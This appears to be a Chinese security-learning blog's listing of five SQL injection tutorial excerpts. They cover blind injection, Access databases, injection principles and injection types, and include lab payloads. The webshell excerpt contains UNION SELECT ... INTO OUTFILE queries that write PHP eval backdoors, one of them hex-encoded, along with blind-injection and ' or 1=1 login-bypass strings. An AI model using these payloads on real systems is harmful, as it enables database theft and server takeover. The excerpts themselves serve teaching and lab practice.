TypechoJoeTheme

学习使用

统计
登录
用户名
密码
搜索到 5 篇与 的结果 ———
2022-01-07

盲注详解

盲注详解
{lamp/}盲注SQL注入类型​布尔型盲注时间延迟型盲注​报错型盲注其他报错函数​DNSlog快速注入{lamp/}     一、布尔盲注“布尔盲注”又称布尔判断,指的是利用SQL语句逻辑与(and)操作,判断and两边的条件是否成立,SQL语句带入数据库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态;看具体函数使用,要求必须掌握left、substr、ascii、regexp、like函数用法;▲left(user())>’10’ ​ user()显示当前数据库用户,length统计字符长度。示例:http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(user())>20 --+http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(user())=14 --+▲left(user(),1)>’s’ //left()函数user()显示当前数据库用户,le...
admin
2022-01-07

WEB漏洞,SQL注入

2,191 阅读
2 评论
2022年01月07日
2,191 阅读
2 评论
2022-01-01

其他数据库注入

其他数据库注入
{lamp/}Access数据库注入Microsoft Office Access 是由微软发布的关系数据库管理系统。小巧而灵活,是Windows下小型C/S系统和网站B/S不错的选择。Access的用途体现在两个方面:一、用来进行数据分析: Access有强大的数据处理、统计分析能力,利用access的查询功能,可以方便地进行各类汇总、平均等统计;二、用来开发软件: Access用来开发软件,比如生产管理、销售管理、库存管理等各类企业管理软件,在开发一些小型网站WEB应用程序时,用来存储数据。例如ASP+Access判断数据库类型根据url的后缀。ASP为后缀名的是ACCESS数据库在url后面加单引号,以报错信息“Microsoft ole db provider for odbc drivers”判断为access通过and (select count(*) from msysobjects)>0发生错误页面则为access数据库。msysobjects、msysqueries\msysrelationships为access的三个系统表,web环境下没有权限...
admin
2022-01-01

WEB漏洞,SQL注入

1,245 阅读
0 评论
2022年01月01日
1,245 阅读
0 评论
2021-12-24

SQL注入写webshell

SQL注入写webshell
一、MySQL写shell写入WebShell的几种方式1、利用Union select 写入需要满足的条件对web目录有写权限GPC关闭(GPC:是否对单引号转义)有绝对路径(读文件可以不用,写文件需要)没有配置secure-file-priv?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'D:/WWW/evil.php' ?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "D:/WWW/evil.php"2、利用分隔符写入?id=1 into outfile 'D:/WWW/evil.php' fie...
admin
2021-12-24

WEB漏洞,SQL注入

2,329 阅读
0 评论
2021年12月24日
2,329 阅读
0 评论
2021-12-22

SQL注入漏洞原理

SQL注入漏洞原理
SQL注入基本概念当攻击者在可控输入点输入恶意的SQL语句,后端Web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,直接输入数据库引擎执行,攻击者可实现获取或修改数据库中的数据。SQL注入本质后端处理程序,不加思索把用户输入的数据当做代码来执行,违背了“数据与代码分离”的原则。主要还是后端开发人员没有安全意识,没有做好过滤和防护措施。SQL注入原理详解比如一个登录接口的语句:$user = $_POST["user"]; $passwd = $_POST["pass"]; $sql=" SELECT * FROM user WHERE username = '$user' AND password = '$passwd' "'user'、'passwd'是从前端传入的参数。当我们传入恶意的user、passwd参数,如 $user=' or 1=1 #。此时拼接的sql语句为:$sql=" SELECT * FROM user WHERE username = '...
admin
2021-12-22

WEB漏洞,SQL注入

3,256 阅读
0 评论
2021年12月22日
3,256 阅读
0 评论
2021-12-21

SQL注入分类

SQL注入分类
SQL注入分类1.基于参数注入类型联合注入数字型注入字符型注入2.基于提交方式注入类型GET提交注入类型POST提交注入类型COOKIE提交注入类型UA提交注入类型Referer提交注入类型3.盲注SQL注入类型​布尔型盲注​时间延迟型盲注​报错型盲注​其他报错函数​DNSlog快速注入4.基于查询方式注入类型select语句引起注入insert语句引起注入​update语句引起注入​delete语句引起注入5.其他SQL注入类型二次编码注入堆叠注入宽字节注入二次注入JSON注入1、基于参数注入类型联合注入联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。联合注入的条件:1、界面能够回显数据库查询到的数据;2、界面回显内容至少能够显示数据库中的某列数据; 注意:SQL注入针对的是市面所有数据库存在的漏洞,而不是仅针对MySQL数据库,仅因为MyS...
admin
2021-12-21

WEB漏洞,SQL注入

4,213 阅读
0 评论
2021年12月21日
4,213 阅读
0 评论